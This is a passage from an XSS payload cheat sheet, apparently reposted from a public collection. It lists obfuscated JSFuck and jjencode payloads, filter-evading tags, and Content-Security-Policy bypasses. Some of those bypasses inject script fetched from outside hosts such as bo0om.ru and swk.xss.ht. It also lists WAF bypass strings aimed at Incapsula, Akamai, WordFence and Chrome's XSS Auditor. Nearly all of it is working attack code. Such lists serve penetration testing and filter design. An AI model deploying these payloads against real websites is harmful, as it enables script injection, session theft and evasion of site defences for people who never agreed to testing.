    <script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script>
    <script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>

    ```


    Exotic payloads


    ```javascript
    <svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
    <img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
    <script>$=1,alert($)</script>
    <script ~~~>confirm(1)</script ~~~>
    <script>$=1,\u0061lert($)</script>
    <</script/script><script>eval('\u'+'0061'+'lert(1)')//</script>
    <</script/script><script ~~~>\u0061lert(1)</script ~~~>
    </style></scRipt><scRipt>alert(1)</scRipt>
    <img/id="alert&lpar;'XSS')"/alt="/"src="/"onerror=eval(id)>
    <img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)>
    <svg><x><script>alert('1')</x>
    <iframe src=""/srcdoc='&lt;svg onload&equals;alert&lpar;1&rpar;&gt;'>
    ```


    ## CSP Bypass


    Check the CSP on [https://csp-evaluator.withgoogle.com](https://csp-evaluator.withgoogle.com) and the post : [How to use Google’s CSP Evaluator to bypass CSP](https://blog.thomasorlita.cz/vulns/google-csp-evaluator/)


    ### Bypass CSP using JSONP from Google (Trick by [@apfeifer27](https://twitter.com/apfeifer27))


    //google.com/complete/search?client=chrome&jsonp=alert(1);


    ```js

    <script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>"

    ```


    ### Bypass CSP by [lab.wallarm.com](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa)


    Works for CSP like `Content-Security-Policy: default-src 'self' 'unsafe-inline';`, [POC here](http://hsts.pro/csp.php?xss=f=document.createElement%28"iframe"%29;f.id="pwn";f.src="/robots.txt";f.onload=%28%29=>%7Bx=document.createElement%28%27script%27%29;x.src=%27//bo0om.ru/csp.js%27;pwn.contentWindow.document.body.appendChild%28x%29%7D;document.body.appendChild%28f%29;)


    ```js

    script=document.createElement('script');

    script.src='//bo0om.ru/csp.js';

    window.frames[0].document.head.appendChild(script);

    ```


    ### Bypass CSP by [Rhynorater](https://gist.github.com/Rhynorater/311cf3981fda8303d65c27316e69209f)


    ```js

    d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://swk.xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)

    ```


    ### Bypass CSP by [@akita_zen](https://twitter.com/akita_zen)


    Works for CSP like `script-src 'self'` (the keyword must be quoted in a real header; an unquoted `self` would be parsed as a host name)


    ```js

    <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>

    ```


    ## Common WAF Bypass


    ### Chrome XSS Auditor - 9th August (the Auditor was removed in Chrome 78, so this only affects older Chrome builds)


    ```javascript

    </script><svg><script>alert(1)-%26apos%3B

    ```


    Live example by @brutelogic - [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?c1=</script><svg><script>alert(1)-%26apos%3B)


    ### Incapsula WAF Bypass - 8th march


    ```javascript

    anythinglr00</script><script>alert(document.domain)</script>uxldz


    anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz

    ```


    ### Incapsula WAF Bypass - 11th september


    ```javascript

    <object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>

    ```


    ### Akamai WAF Bypass by @zseano - 18th june


    ```javascript

    ?"></script><base%20c%3D=href%3Dhttps:mysite>

    ```


    ### Akamai WAF Bypass by [@s0md3v](https://twitter.com/s0md3v/status/1056447131362324480) - 28th october


    ```html

    <dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>

    ```


    ### WordFence WAF Bypass by @brutelogic - 12th september


    ```javascript

    <a href=javascript:alert(1)>

    ```


    ## More fun


    This section will be used for the "fun/interesting/useless" stuff.


    Use notification box instead of an alert - by [@brutelogic](https://twitter.com/brutelogic)

    Note : it requires user permission


    ```javascript

    Notification.requestPermission(x=>{new(Notification)(1)})

    ```


    Try here : [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?c3=%27;Notification.requestPermission(x=>%7Bnew(Notification)(1)%7D)//)


    ## Thanks to


    - [Unleashing-an-Ultimate-XSS-Polyglot](https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot)

    - tbm

    - [(Relative Path Overwrite) RPO XSS - Infinite Security](http://infinite8security.blogspot.com/2016/02/welcome-readers-as-i-promised-this-post.html)

    - [RPO TheSpanner](http://www.thespanner.co.uk/2014/03/21/rpo/)

    - [RPO Gadget - innerthmtl](http://blog.innerht.ml/rpo-gadgets/)

    - [Relative Path Overwrite - Detectify](http://support.detectify.com/customer/portal/articles/2088351-relative-path-overwrite)

    - [XSS ghettoBypass - d3adend](http://d3adend.org/xss/ghettoBypass)

    - [XSS without HTML: Client-Side Template Injection with AngularJS](http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html)

    - [XSSING WEB PART - 2 - Rakesh Mane](http://blog.rakeshmane.com/2017/08/xssing-web-part-2.html)

    - [Making an XSS triggered by CSP bypass on Twitter. @tbmnull](https://medium.com/@tbmnull/making-an-xss-triggered-by-csp-bypass-on-twitter-561f107be3e5)

    - [Ways to alert(document.domain) - @tomnomnom](https://gist.github.com/tomnomnom/14a918f707ef0685fdebd90545580309)

     

    Reference: https://www.darknet.org.uk/2018/03/xsstrike-advanced-xss-fuzzer-exploitation-suite/

    Original post: https://www.cnblogs.com/youyouii/p/9943464.html